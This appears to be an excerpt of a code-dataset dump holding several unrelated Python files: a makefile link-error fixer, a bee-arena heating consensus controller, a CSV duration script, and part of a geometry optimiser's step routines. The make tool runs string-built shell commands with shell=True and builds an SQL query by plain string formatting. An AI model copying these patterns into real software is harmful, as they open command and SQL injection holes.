\"undefined reference to `${symbol_name}'\"\n\t\tline_num_msg = \"Makefile:${line_num}: recipe for target '${target_name}' failed\"\n\t\tpath_msg = \"make[${num}]: Leaving directory '${path}'\"\n\n##########################################\n#\t- get_command funtion\n#\n#\tread command from consol and parse the command.\n#\tconfig path is the only command line option.\n##########################################\n\ndef get_command():\t\t\t\t\t#Basic command is 'make' and add options to cmd list\n\tglobal config,quiet\n\tstr = 'make --trace '\n\tif len(sys.argv) > 1:\t\t\t#make has options\n\t\tstr +=' '.join(sys.argv[1:])\n\t\t\n\tcmd = [s for s in str.split(' ') if s]\n\tfor i in range(0,len(cmd)):\t\t#check options\n\t\tif cmd[i].startswith(\"config=\"):\n\t\t\tconfig = cmd[i][7:]\n\t\t\tdel cmd[i]\n\t\telif cmd[i] == \"-Q\":\n\t\t\tquiet = True\n\t\t\tdel cmd[i]\n\treturn cmd\n\n##################################################\n#\t- find_error function\n#\n#\tparsing the output message of make\n#\tsave the error's details to struct 'error'\n#\n#\t'error' struct has elements below\n# \t\terror[\"error\"]:\t\tundefined reference\n#\t\terror[\"line\"]:\t\tthe line number of a Makefile error occured\n#\t\terror[\"path\"]:\t\tthe path of Makefile which has an error.\n#\t\terror[\"target\"]:\tthe name of a target error occurred\n#\t\terror[\"symbol\"]:\tthe name of a missing symbol\n#\t\terror[\"original_cmd\"]: \tthe command error occured\n##################################################\ndef find_error():\n\tglobal symbol_msg,line_num_msg,path_msg\n\terror = {}\n\tregex1 = re.compile(symbol_msg.replace(\"*\",\"\\*\").replace(\"[\",\"\\[\").replace(\"]\",\"\\]\").replace(\"${symbol_name}\",\"(.+)\"))\n\tregex2 = re.compile(line_num_msg.replace(\"*\",\"\\*\").replace(\"[\",\"\\[\").replace(\"]\",\"\\]\").replace(\"${line_num}\",\"(.+)\").replace(\"${target_name}\",\"(.+)\"))\n\tregex3 = re.compile(path_msg.replace(\"*\",\"\\*\").replace(\"[\",\"\\[\").replace(\"]\",\"\\]\").replace(\"${num}\",\"(.+)\").replace(\"${path}\",\"(.+)\"))\n\t\n\twith open(\"output.txt\",\"r\") as output_file:\n\t\tlines = output_file.readlines()\n\t\t\n\t\tfor i in range(len(lines)):\n\t\t\tresult = regex2.search(lines[i])\n\t\t\tif result:\n\t\t\t\terror[\"line\"] = int(result.group(1))\n\t\t\t\terror[\"target\"] = result.group(2)\n\t\t\t\terror[\"path\"] = \"\"\n\t\t\t\tfor j in range(i+1,len(lines)-1):\n\t\t\t\t\tresult = regex3.search(lines[j])\n\t\t\t\t\tif result:\n\t\t\t\t\t\terror[\"path\"] = result.group(2)\n\t\t\t\t\t\tbreak\n\t\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"[Makefile observer] cannot find error line number in Makefile\")\n\t\t\texit()\n\t\t\t\n\t\tfor i in range(len(lines)):\n\t\t\tresult = regex1.search(lines[i])\n\t\t\tif lines[i].startswith(\"Makefile:{}:\".format(error[\"line\"])):\n\t\t\t\tfor j in range(i,len(lines)):\n\t\t\t\t\tif lines[j].find(\"--as-needed\") != -1 and is_error(error[\"path\"],lines[j]):\n\t\t\t\t\t\terror[\"original_cmd\"] = lines[j].replace(\"\\n\",\"\")\n\t\t\t\t\t\terror[\"command\"] = lines[j].replace(\"\\n\",\"\")\n\t\t\t\t\t\tbreak\n\t\t\tif result:\n\t\t\t\terror[\"error\"] = 'undefined reference'\n\t\t\t\terror[\"symbol\"] = result.group(1)\n\t\t\t\terror[\"same\"] = []\n\t\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"[Makefile observer] cannot find undefined reference\")\n\t\t\texit()\n\treturn error\n\ndef is_error(path,command):\n\ttry:\n\t\tprint(path)\n\t\tsubprocess.check_call(\"cd {} && {}\".format(path,command),shell=True)\n\t\treturn False\n\texcept:\n\t\treturn True\n\n##################################################\n#\t- find_command_error function\n#\tsimilar to find error function.\n#\tbut this function find only the missing symbol's name.\n##################################################\ndef find_command_error(error):\n\tglobal symbol_msg\n\tregex = re.compile(symbol_msg.replace(\"*\",\"\\*\").replace(\"[\",\"\\[\").replace(\"]\",\"\\]\").replace(\"${symbol_name}\",\"(.+)\"))\n\twith open(\"output.txt\",\"r\") as output_file:\n\t\tlines = output_file.readlines()\n\t\tfor i in range(len(lines)):\n\t\t\tresult = regex.search(lines[i])\n\t\t\tif result:\n\t\t\t\terror[\"symbol\"] = result.group(1)\n\t\t\t\tbreak\n\treturn error\n\n#print the details of an error\ndef print_error(error):\t\n\tprint(\"\\n[Makefile observer] -------print error information-------\")\n\tprint(\"[Makefile observer] a undefined reference error occured\")\n\tif error[\"path\"]:\n\t\tprint(\"[Makefile observer] path:{}\".format(error[\"path\"]))\n\tprint(\"[Makefile observer] line[{}] of makefile\".format(error[\"line\"]))\n\tprint(\"[Makefile observer] Missing symbol: {}\".format(error[\"symbol\"]))\n\tprint(\"[Makefile observer] error command: {}\".format(error[\"original_cmd\"]))\n\tprint(\"[Makefile observer] fixed command: {}\".format(error[\"fixed_cmd\"]))\n\tprint(\"[Makefile observer] library order: {}\".format(error[\"lib_order\"]))\n\tprint(\"[Makefile observer] fixed order: {}\".format(error[\"fixed_lib_order\"]))\n\tfor same in error[\"same\"]:\n\t\tprint('[Makefile observer] symbol \"{}\" is found in {} libraries'.format(same[0],same[3]))\n\t\tprint('[Makefile observer] \"{}\" is selected (in {})'.format(same[1],same[2]))\n\n\t\n##################################################\n#\t- get_library function\n#\n#\tsearch the missing symbol from DB,\n#\treturn the name of the library\n##################################################\ndef get_library(error):\t\t\t## search missing symbol from DB\n\tusername = getpass.getuser();\n\tconn = pymysql.connect(host=\"localhost\", user=username, db=username+'_db', charset ='utf8')\n\tcur = conn.cursor()\n\n\tsql = 'select library_name,directory from for_symbol s, for_inotify i where s.symbol=\"{}\" and s.wd=i.wd;'.format(error[\"symbol\"])\n\tcur.execute(sql)\n\n\trows = cur.fetchall()\n\trowcount = cur.rowcount\n\n\tif rowcount > 0:\n\t\tif rowcount > 1:\n\t\t\terror[\"same\"].append([error[\"symbol\"],rows[0][0],rows[0][1],rowcount])\n\t\tcur.close()\n\t\tconn.close()\n\t\treturn \"-l\"+rows[0][0][3:rows[0][0].find(\".\")]\n\telse:\n\t\tprint(\"[Makefile observer] Can not find symbol {} from DB\".format(error[\"symbol\"]))\n\t\texit()\n\n##################################################\n#\t- fix_command function\n#\n#\tby parsing the error command\n#\tadd missing library and delete if it already included\n##################################################\ndef fix_command(error):\n\tlib = []\n\tbefore_lib_command = []\n\tafter_lib_command = []\n\n\ttry:\n\t\tcommand = error[\"command\"].strip().split(' ')\n\t\tidx = command.index(\"-Wl,--as-needed\")+1\n\texcept:\n\t\tprint(\"[Makefile observer] The error is not a 'as-needed' problem\")\n\t\tprint(\"[Makefile observer] This program cannot fix it.\")\n\t\texit()\n\n\tbefore_lib_command = command[:idx]\n\n\tfor option in command[idx:]:\n\t\tif option.startswith(\"-l\"):\n\t\t\tlib.append(option)\n\t\telse:\n\t\t\tafter_lib_command.append(option)\n\n\tif 'lib_order' not in error:\n\t\terror[\"lib_order\"] = ' '.join(lib)\n\tmissing_lib = get_library(error)\n\ttry:\t\t#if the missing library is already exist, the order is wrong. so delete it and add it at the end\n\t\tdel lib[lib.index(missing_lib)]\n\texcept:\n\t\tpass\n\t\n\tlib.append(missing_lib)\n\terror[\"fixed_lib_order\"] = ' '.join(lib)\n\tfixed_command = before_lib_command+lib+after_lib_command\n\treturn ' '.join(fixed_command)\n\n##################################################\n#\t-check_fixed function\n#\n#\tthe fix_Command funtion only add one library.\n#\tso if several libraries are excluded, we have to do fix_command several time.\n#\tthis function check whether the fixed command is really fixed\n##################################################\ndef check_fixed(fixed_command):\n\twith open(\"output.txt\",\"w\") as output_file:\n\t\ttry:\n\t\t\tsubprocess.check_call(fixed_command,stdout = output_file, stderr = output_file,shell=True)\n\t\t\treturn True\n\t\texcept:\n\t\t\treturn False\n\n##################################################\n#\t-fix_error function\n#\n#\tthis function fixes the error command and ask to the user\n#\twhether keep on making with fixed command or not\n##################################################\ndef fix_error(error):\n\tglobal quiet\n\tfixed_command = fix_command(error)\n\tmove_to_path = \"cd \"+error[\"path\"]+\" && \"\n\tfinal_command = fixed_command\n\tif error[\"path\"] != \"\":\n\t\tfinal_command = move_to_path+fixed_command\n\n\n\twhile not check_fixed(final_command):\n\t\terror = find_command_error(error)\n\t\terror[\"command\"] = fixed_command\n\t\tfixed_command = fix_command(error)\n\t\tif(error[\"command\"] == fixed_command):\n\t\t\tif(not quiet):\n\t\t\t\terror[\"fixed_cmd\"] = fixed_command\n\t\t\t\tprint_error(error)\n\t\t\tprint(\"\\n[Makefile observer] The fixed command also has an error.\")\n\t\t\tprint(\"[Makefile observer] Cannot fix the error.\")\n\t\t\texit()\n\n\t\tif error[\"path\"]:\n\t\t\tfinal_command = move_to_path+fixed_command\n\t\telse:\n\t\t\tfinal_command = fixed_command\n\n\terror[\"fixed_cmd\"] = fixed_command\n\tif(not quiet):\n\t\tprint_error(error)\n\n\tglobal keep_on\n\tif keep_on:\n\t\treturn True\n\telse:\n\t\ttry:\n\t\t\tanswer = raw_input(\"[Makefile observer] Keep make with fixed command? [Y/N]: \")\n\t\texcept:\n\t\t\tanswer = input(\"[Makefile observer] Keep make with fixed command? [Y/N]: \")\n\t\t\n\t\tif answer[0] == 'Y' or answer[0] == 'y':\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n####################################################################################\n#\tmain function\n####################################################################################\n\n#default setting\nmake_version = \"4.1\"\nverbose = True\nkeep_on = False\nquiet = False\nconfig = \"~/deptools/symbol_config\"\ncmd = get_command()\nread_config()\n\nwhile True:\n\t#file for write error output.\n\ttry:\n\t\toutput_file=open(\"output.txt\",\"w\");\n\t\tproc=subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)\n\t\tfor line in proc.stdout:\n\t\t\toutput_file.write(line)\n\t\t\tif line.startswith(\"Makefile\") and line.find(\"due to\",11)!=-1:\n\t\t\t\tcontinue\n\t\t\telif line.startswith(\"printf\") or line.startswith(\"echo\"):\n\t\t\t\tcontinue\n\t\t\tif verbose:\n\t\t\t\tsys.stdout.write(line)\n\t\tproc.wait()\n\t\tif proc.returncode:\n\t\t\traise Exception(proc.returncode)\n\t\telse:\n\t\t\tprint(\"[Makefile observer] make complete!\")\n\t\t\tbreak\n\n\texcept Exception as e:\n\t\toutput_file.close()\n\t\tif(str(e) == \"2\"):\t\t\t#there is a error in Makefile\n\t\t\tif(not quiet):\n\t\t\t\tprint(\"[Makefile observer] Error in Makefile\")\n\t\t\terror = find_error()\n\t\t\tif error:\n\t\t\t\tif(fix_error(error)):\n\t\t\t\t\tif(not quiet):\n\t\t\t\t\t\tprint(\"[Makefile observer] Error is fixed. keep make\\n\")\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tprint(\"[Makefile observer] Error is not fixed.\")\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"[Makefile observer] An error occured, but it's not undefined reference.\")\n\t\t\t\tprint(\"[Makefile observer] This program cannot fix it.\")\n\t\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"[Makefile observer] unknown error is occured: {}\".foramt(str(e)))\n\t\t\tbreak\n","sub_path":"testdir/make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":12199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"549635024","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom consensus_algorithm import ConsensusAlgorithm\n\nfrom assisipy import casu\n\nimport sys\nimport time\nfrom threading import Thread, Event\nfrom datetime import datetime\nfrom copy import deepcopy\nimport json\nimport csv\n\nclass ConsensusController(Thread):\n\n def __init__(self, rtc_file, consensus, log=False):\n \n Thread.__init__(self)\n\n self.casu = casu.Casu(rtc_file,log=True)\n nbg_ids = [int(name[-3:]) for name in self.casu._Casu__neighbors]\n self.nbg_data_buffer = {}\n for nb in nbg_ids:\n self.nbg_data_buffer[nb] = []\n self.consensus = deepcopy(consensus)\n\n self.Td = 0.25 # Sample time for consensus is 1 second\n self.t_prev = time.time()\n self.stop_flag = Event()\n\n # Bee density estimation variables\n self.numbees = [0]\n self.nb_buf_len = 5\n self.ir_thresholds = [25000, 25000, 25000, 25000, 25000, 25000]\n\n # Set up zeta logging\n now_str = datetime.now().__str__().split('.')[0]\n now_str = now_str.replace(' ','-').replace(':','-')\n self.logfile = open(now_str + '-' + self.casu.name() + '-zeta.csv','wb')\n self.logger = csv.writer(self.logfile, delimiter=';')\n\n def calibrate_ir_thresholds(self, margin = 500, duration = 5):\n\n self.casu.set_diagnostic_led_rgb(r=1) \n \n t_start = time.time()\n count = 0\n ir_raw_buffers = [[0],[0],[0],[0],[0],[0]]\n while time.time() - t_start < duration:\n ir_raw = self.casu.get_ir_raw_value(casu.ARRAY)\n for val,buff in zip(ir_raw,ir_raw_buffers):\n buff.append(val)\n time.sleep(0.1)\n \n self.ir_thresholds = [max(buff)+margin for buff in ir_raw_buffers]\n print(self.casu.name(), self.ir_thresholds)\n \n self.casu.diagnostic_led_standby()\n \n def update(self):\n t_old = self.t_prev\n self.t_prev = time.time()\n #print(self.casu.name(),self.t_prev - t_old)\n \n casu_id = self.consensus.casu_id\n \n # Hack for testing\n numbees_fake = [0,3,0,0,0,0,0,0,6]\n self.update_numbees_estimate()\n numbees = sum(self.numbees)/float(len(self.numbees))\n numbees = numbees_fake[casu_id-1]\n #print(self.casu.name(),numbees)\n\n # Compute one step of the algorithm\n self.consensus.step(numbees,0.1)\n\n # Set temperature reference\n self.casu.set_temp(self.consensus.t_ref[casu_id-1])\n\n # Communicate with neighbors\n for nbg in self.casu._Casu__neighbors:\n self.casu.send_message(nbg,json.dumps(self.consensus.zeta[-1][casu_id-1])\n + ';' + str(self.consensus.t_ref[casu_id-1]))\n\n # Update data buffer with messages from all neighbors\n # We wait here until we have at least one message from every neighbor\n updated_all = False\n while not updated_all:\n msg = self.casu.read_message()\n if msg:\n nbg_id = int(msg['sender'][-3:])\n self.nbg_data_buffer[nbg_id].append(msg['data'])\n # Check if we now have at least one message from each neighbor\n updated_all = True\n for nbg in self.nbg_data_buffer:\n if not self.nbg_data_buffer[nbg]:\n updated_all = False\n \n \n # We got at least one message from every neighbor\n # We can now update our zeta\n for nbg_id in self.nbg_data_buffer:\n #print(self.casu.name(), nbg, ['%.3f' % z for z in self.consensus.zeta[-1][nbg-1]]) \n #print(self.casu.name(), nbg, self.consensus.t_ref) \n data = self.nbg_data_buffer[nbg_id].pop(0).split(';')\n rec_nbg_zeta = json.loads(data[0])\n rec_nbg_temp = float(data[1])\n self.consensus.zeta[-1][nbg_id -1] = deepcopy(rec_nbg_zeta)\n self.consensus.t_ref[nbg_id-1] = rec_nbg_temp\n# if self.casu.name() == 'casu-006':\n# print('zeta c6', casu_sender, ['%.3f' % z for z in self.consensus.zeta[-1][int(casu_sender[-3:])-1]])\n\n # Log zeta\n self.logger.writerow([time.time()] + [z for row in self.consensus.zeta[-1] for z in row])\n \n print(self.casu.name(),['%.3f' % z for z in self.consensus.zeta[-1][self.consensus.casu_id-1]], 'T_ref=', ['%.1f' % y for y in self.consensus.t_ref], numbees)\n #print(self.casu.name(),['%.3f' % z for z in self.consensus.zeta[-1][self.consensus.casu_id-1]], 'T_ref=', ['%.1f' % y for y in self.consensus.t_ref], 'nb=', numbees)\n #print(self.casu.name(),['%.3f' % z for z in self.consensus.zeta[-1][self.consensus.casu_id-1]],casu_sender,['%.3f' % z for z in rec_nbg_zeta])\n\n\n def run(self):\n # Just call update every Td\n while not self.stop_flag.wait(self.Td):\n self.update()\n\n # Turn off heating\n self.casu.temp_standby()\n print('Turned off heater, exiting...')\n\n def update_numbees_estimate(self):\n \"\"\"\n Bee density estimator.\n \"\"\"\n self.numbees.append(sum([x>t for (x,t) in zip(self.casu.get_ir_raw_value(casu.ARRAY),\n self.ir_thresholds)]))\n if len(self.numbees) > self.nb_buf_len:\n self.numbees.pop(0)\n\n\nif __name__ == '__main__':\n\n assert(len(sys.argv) > 1)\n\n rtc = sys.argv[1]\n \n # Parse rtc file name to get CASU id\n # assumes casu-xxx.rtc file name format\n casu_id = int(rtc[-7:-4])\n\n # Initialize consensus algorithm\n a1 = 0\n a = 0.1\n a2 = 0\n zeta = [[[a1, a, a2, a, a2, a2, a2, a2, a2], \n [a, a1, a, a2, a, a2, a2, a2, a2],\n [a2, a, a1, a2, a2, a, a2, a2, a2],\n [a, a2, a2, a1, a, a2, a, a2, a2],\n [a2, a, a2, a, a1, a, a2, a, a2], \n [a2, a2, a, a2, a, a1, a2, a2, a],\n [a2, a2, a2, a, a2, a2, a1, a, a2],\n [a2, a2, a2, a2, a, a2, a, a1, a],\n [a2, a2, a2, a2, a2, a, a2, a, a1]]] \n\n# zeta = [[[0,0.1,0.1,0],\n# [0.1,0,0,0.1],\n# [0.1,0,0,0.1],\n# [0,0.1,0.1,0]]]\n\n # Adjecency matrix\n A = [[0, 1, 0, 1, 0, 0, 0, 0, 0], \n [1, 0, 1, 0, 1, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 1, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 1, 0, 0],\n [0, 1, 0, 1, 0, 1, 0, 1, 0],\n [0, 0, 1, 0, 1, 0, 0, 0, 1],\n [0, 0, 0, 1, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 1, 0, 1, 0, 1],\n [0, 0, 0, 0, 0, 1, 0, 1, 0]]\n\n# A = [[0,1,1,0],\n# [1,0,0,1],\n# [1,0,0,1],\n# [0,1,1,0]]\n\n ca = ConsensusAlgorithm(casu_id,zeta,A)\n ctrl = ConsensusController(rtc, ca, log=True)\n ctrl.calibrate_ir_thresholds()\n #ctrl.run()\n\n \n \n","sub_path":"heat_aggregation_consensus/controllers/heat_aggregation_consensus.py","file_name":"heat_aggregation_consensus.py","file_ext":"py","file_size_in_byte":6842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"393138145","text":"\"\"\"Write a .csv file that allows us to easily make a box plot\r\nof the duration of the most common CPT code combinations.\r\n\"\"\"\r\nimport srdata\r\nimport csv\r\n\r\nXML_FILE_NAME = 'all bjh.xml'\r\nCPT_FILE_NAMES = CPT_FILE_NAMES = ['./GetCPT Data/April_Output_Org.xls', './GetCPT Data/May_Output_Org.xls']\r\n\r\n\r\ndef main():\r\n\tprocs = srdata.process_file(XML_FILE_NAME, CPT_FILE_NAMES)\r\n\t#sort the procedures by their CPT code combinations\r\n\tprocs_by_cpt = {}\r\n\tfor proc in procs:\r\n\t\tif not proc.get_cpts() in procs_by_cpt:\r\n\t\t\tprocs_by_cpt[proc.get_cpts()] = []\r\n\t\tprocs_by_cpt[proc.get_cpts()].append(proc)\r\n\t#write a table of CPT code combinations followed by all the durations of the associated procedures\r\n\ttable = []\r\n\tfor (cpts, proc_list) in procs_by_cpt.iteritems():\r\n\t\trow_header = \"'\" +','.join([str(x) for x in cpts])\r\n\t\trow = [row_header] + [proc.get_duration() for proc in proc_list if not proc.get_duration() is None]\r\n\t\tif len(row)>4:\r\n\t\t\ttable.append(row)\r\n\twriter = csv.writer(open('output.csv','wb'))\r\n\twriter.writerows(table)\r\n\r\nif __name__ == '__main__':\r\n\tmain()","sub_path":"unported scripts/plot_duration.py","file_name":"plot_duration.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"390211931","text":"# Functions for step algorithms: Newton-Raphson, Rational Function Optimization,\n# Steepest Descent.\n# from .OptParams import Params # this will not cause changes in trust to persist\nimport logging\nfrom math import fabs, sqrt\n\nimport numpy as np\n\nfrom . import optimize\nfrom . import optparams as op\nfrom . import v3d\nfrom .addIntcos import linear_bend_check\nfrom .displace import displace_molsys\nfrom .exceptions import AlgError, OptError\nfrom .history import oHistory\nfrom .linearAlgebra import abs_max, asymm_mat_eig, norm, symm_mat_eig, symm_mat_inv\nfrom .misc import is_dq_symmetric\nfrom .printTools import print_array_string, print_mat_string\n\n\ndef take_step(o_molsys, E, q_forces, H, stepType=None, computer=None, hist=None, params=None):\n \"\"\"This method computes the step, calls displaces the geometry and updates history with\n the results.\n\n Parameters\n ----------\n o_molsys : molsys.Molsys\n optking's molecular system\n E : double\n energy [aO]\n q_forces : ndarray\n forces in internal coordinates [aO]\n H : ndarray\n hessian in internal coordinates\n stepType : string, optional\n defaults to stepType in options\n computer : computeWrapper, optional\n hist : history.History object\n\n Returns\n -------\n np.ndarray\n dispalcement in internals\n\n Notes\n -----\n step_grad and step_hess are the gradient and hessian in the direction of the step.\n\n \"\"\"\n if hist is None:\n hist = oHistory\n if params is None:\n params = op.Params\n logger = logging.getLogger(__name__)\n\n if len(H) == 0 or len(q_forces) == 0:\n logger.warning(\"Missing Hessian or Forces. Step is 0\")\n return np.zeros(0)\n\n if not stepType:\n stepType = params.step_type\n\n if stepType == \"NR\":\n delta_E_projected, dq, unit_step, step_grad, step_hess = dq_nr(q_forces, H)\n elif stepType == \"RFO\":\n delta_E_projected, dq, unit_step, step_grad, step_hess = dq_rfo(o_molsys, q_forces, H)\n elif stepType == \"SD\":\n delta_E_projected, dq, unit_step, step_grad, step_hess = dq_sd(q_forces)\n elif stepType == \"BACKSTEP\":\n return dq_backstep(o_molsys) # Do an early quit Back step takes care of history and displacing\n elif stepType == \"P_RFO\":\n delta_E_projected, dq, unit_step, step_grad, step_hess = dq_p_rfo(q_forces, H)\n elif stepType == \"LINESEARCH\":\n # achieved_dq already back\n delta_E_projected, achieved_dq, unit_step, step_grad, step_hess = dq_linesearch(\n o_molsys, E, q_forces, H, computer\n )\n else:\n raise OptError(\"Dq: step type not yet implemented\")\n\n if stepType != \"LINESEARCH\":\n # linesearch performs multiple displacements in order to calculate energies\n o_molsys.interfrag_dq_discontinuity_correction(dq)\n achieved_dq = displace_molsys(o_molsys, dq, q_forces)\n\n dq_norm = np.linalg.norm(achieved_dq)\n logger.info(\"\\tNorm of achieved step-size %15.10f\" % dq_norm)\n\n hist.append_record(delta_E_projected, achieved_dq, unit_step, step_grad, step_hess)\n\n linearList = linear_bend_check(o_molsys, achieved_dq)\n if linearList:\n raise AlgError(\"New linear angles\", newLinearBends=linearList)\n\n # Before quitting, make sure step is reasonable. It should only be\n # screwball if we are using the \"First Guess\" after the back-transformation failed.\n dq_norm = np.linalg.norm(achieved_dq[0 : o_molsys.num_intrafrag_intcos])\n if dq_norm > 5 * params.intrafrag_trust:\n raise AlgError(\"opt.py: Step is far too large.\")\n\n return achieved_dq\n\n\n# TODO this method was described as crude do we need to revisit?\ndef apply_intrafrag_step_scaling(dq):\n \"\"\" Apply maximum step limit by scaling.\"\"\"\n logger = logging.getLogger(__name__)\n trust = op.Params.intrafrag_trust\n if sqrt(np.dot(dq, dq)) > trust:\n scale = trust / sqrt(np.dot(dq, dq))\n logger.info(\"\\tStep length exceeds trust radius of %10.5f.\" % trust)\n logger.info(\"\\tScaling displacements by %10.5f\" % scale)\n dq *= scale\n return\n\n\ndef de_projected(model, step, grad, hess):\n \"\"\" Compute anticpated energy change along one dimension \"\"\"\n if model == \"NR\":\n return step * grad + 0.5 * step * step * hess\n elif model == \"RFO\":\n return (step * grad + 0.5 * step * step * hess) / (1 + step * step)\n else:\n raise OptError(\"de_projected does not recognize model.\")\n\n\ndef dq_nr(fq, H):\n \"\"\"Takes a step according to Newton Raphson algorithm\n\n Parameters\n ----------\n o_molsys : molsys.Molsys\n optking molecular system\n E : double\n energy\n fq : ndarray\n forces in internal coordiantes\n H : ndarray\n hessian in internal coordinates\n\n Notes\n -----\n Presently, the attempted dq is stored in history not the\n actual dq from the backtransformation\n\n \"\"\"\n\n logger = logging.getLogger(__name__)\n logger.info(\"\\tTaking NR optimization step.\")\n\n # Hinv fq = dq\n Hinv = symm_mat_inv(H, redundant=True)\n dq = np.dot(Hinv, fq)\n\n # applies maximum internal coordinate change\n apply_intrafrag_step_scaling(dq)\n\n # get norm |q| and unit vector in the step direction\n nr_dqnorm = sqrt(np.dot(dq, dq))\n nr_u = dq / nr_dqnorm\n logger.info(\"\\tNorm of target step-size %15.10lf\" % nr_dqnorm)\n\n # get gradient and hessian in step direction\n nr_g = -1 * np.dot(fq, nr_u) # gradient, not force\n nr_h = np.dot(nr_u, np.dot(H, nr_u))\n\n if op.Params.print_lvl > 1:\n logger.info(\"\\tNR target step|: %15.10f\" % nr_dqnorm)\n logger.info(\"\\tNR_gradient: %15.10f\" % nr_g)\n logger.info(\"\\tNR_hessian: %15.10f\" % nr_h)\n DEprojected = de_projected(\"NR\", nr_dqnorm, nr_g, nr_h)\n logger.debug(\"\\tProjected energy change by quadratic approximation: %10.10lf\\n\" % DEprojected)\n\n return DEprojected, dq, nr_u, nr_g, nr_h\n\n\n# Take Rational Function Optimization step\ndef dq_rfo(oMolsys, fq, H):\n \"\"\"Takes a step using Rational Function Optimization\n\n Parameters\n ----------\n oMolsys : molsys.Molsys\n optking molecular system\n E : double\n energy\n fq : ndarray\n forces in internal coordinates\n H : ndarray\n hessian in internal coordinates\n\n \"\"\"\n\n logger = logging.getLogger(__name__)\n logger.debug(\"\\tTaking RFO optimization step.\")\n dim = len(fq)\n dq = np.zeros(dim) # To be determined and returned.\n\n # Build the original, unscaled RFO matrix.\n RFOmat = np.zeros((dim + 1, dim + 1))\n for i in range(dim):\n for j in range(dim):\n RFOmat[i, j] = H[i, j]\n RFOmat[i, dim] = RFOmat[dim, i] = -fq[i]\n\n if op.Params.print_lvl >= 4:\n logger.debug(\"\\tOriginal, unscaled RFO matrix:\\n\\n\" + print_mat_string(RFOmat))\n\n converged, dq = apply_alpha_step_scaling(RFOmat, H, dq, fq, dim, oMolsys)\n\n # Crude/old way to limit step size if RS-RFO iterations\n if not converged or op.Params.simple_step_scaling:\n apply_intrafrag_step_scaling(dq)\n\n if op.Params.print_lvl >= 3:\n logger.debug(\"\\tFinal scaled step dq:\\n\\n\\t\" + print_array_string(dq))\n\n # Get norm |dq|, unit vector, gradient and hessian in step direction\n # TODO double check Hevects[i] here instead of H ? as for NR\n rfo_dqnorm = sqrt(np.dot(dq, dq))\n logger.info(\"\\tNorm of target step-size: %15.10f\\n\" % rfo_dqnorm)\n rfo_u = dq / rfo_dqnorm\n rfo_g = -1 * np.dot(fq, rfo_u)\n rfo_h = np.dot(rfo_u, np.dot(H, rfo_u))\n DEprojected = de_projected(\"RFO\", rfo_dqnorm, rfo_g, rfo_h)\n if op.Params.print_lvl > 1:\n logger.info(\"\\tRFO target step = %15.10f\" % rfo_dqnorm)\n logger.info(\"\\tRFO gradient = %15.10f\" % rfo_g)\n logger.info(\"\\tRFO hessian = %15.10f\" % rfo_h)\n logger.debug(\"\\tProjected energy change by RFO approximation %15.5f\\n\" % DEprojected)\n\n return DEprojected, dq, rfo_u, rfo_g, rfo_h\n\n\ndef apply_alpha_step_scaling(RFOmat, H, dq, fq, dim, oMolsys):\n \"\"\"Iterative process to determine alpha step scaling parameter\"\"\"\n\n logger = logging.getLogger(__name__)\n SRFOmat = np.zeros((dim + 1, dim + 1)) # For scaled RFO matrix.\n converged = False\n alpha = 1.0 # scaling factor for RS-RFO, scaling matrix is sI\n alphaIter = -1\n max_projected_rfo_iter = 25 # max. # of iterations to try to converge RS-RFO\n rfo_follow_root = op.Params.rfo_follow_root # whether to follow root\n rfo_root = op.Params.rfo_root # if following, which root to follow\n trust = op.Params.intrafrag_trust # maximum step size\n\n # Determine the eigenvectors/eigenvalues of H.\n Hevals, Hevects = symm_mat_eig(H)\n\n last_iter_evect = np.zeros(dim)\n if rfo_follow_root and len(oHistory.steps) > 1:\n last_iter_evect[:] = oHistory.steps[-2].followedUnitVector # RFO vector from previous geometry step\n rfo_step_report = ''\n\n while not converged and alphaIter < max_projected_rfo_iter:\n alphaIter += 1\n\n # If we exhaust iterations without convergence, then bail on the\n # restricted-step algorithm. Set alpha=1 and apply crude scaling instead.\n if alphaIter == max_projected_rfo_iter:\n logger.warning(\"\\tFailed to converge alpha. Doing simple step-scaling instead.\")\n alpha = 1.0\n elif op.Params.simple_step_scaling:\n # Simple_step_scaling is on, not an iterative method.\n # Proceed through loop with alpha == 1, and then continue\n alphaIter = max_projected_rfo_iter\n\n # Scale the RFO matrix.\n for i in range(dim + 1):\n for j in range(dim):\n SRFOmat[j, i] = RFOmat[j, i] / alpha\n SRFOmat[dim, i] = RFOmat[dim, i]\n\n if op.Params.print_lvl >= 4:\n logger.debug(\"\\tScaled RFO matrix.\\n\\n\" + print_mat_string(SRFOmat))\n\n # Find the eigenvectors and eigenvalues of RFO matrix.\n SRFOevals, SRFOevects = asymm_mat_eig(SRFOmat)\n\n if op.Params.print_lvl >= 4:\n logger.debug(\"\\tEigenvectors of scaled RFO matrix.\\n\\n\" + print_mat_string(SRFOevects))\n\n if op.Params.print_lvl >= 4:\n logger.debug(\"\\tEigenvalues of scaled RFO matrix.\\n\\n\\t\" + print_array_string(SRFOevals))\n logger.debug(\n \"\\tFirst eigenvector (unnormalized) of scaled RFO matrix.\\n\\n\\t\" + print_array_string(SRFOevects[0])\n )\n\n # Do intermediate normalization. RFO paper says to scale eigenvector\n # to make the last element equal to 1. Bogus evect leads can be avoided\n # using root following.\n for i in range(dim + 1):\n # How big is dividing going to make the largest element?\n # Same check occurs below for acceptability.\n if fabs(SRFOevects[i][dim]) > 1.0e-10:\n tval = abs_max(SRFOevects[i] / SRFOevects[i][dim])\n if tval < op.Params.rfo_normalization_max:\n for j in range(dim + 1):\n SRFOevects[i, j] /= SRFOevects[i, dim]\n\n if op.Params.print_lvl >= 4:\n 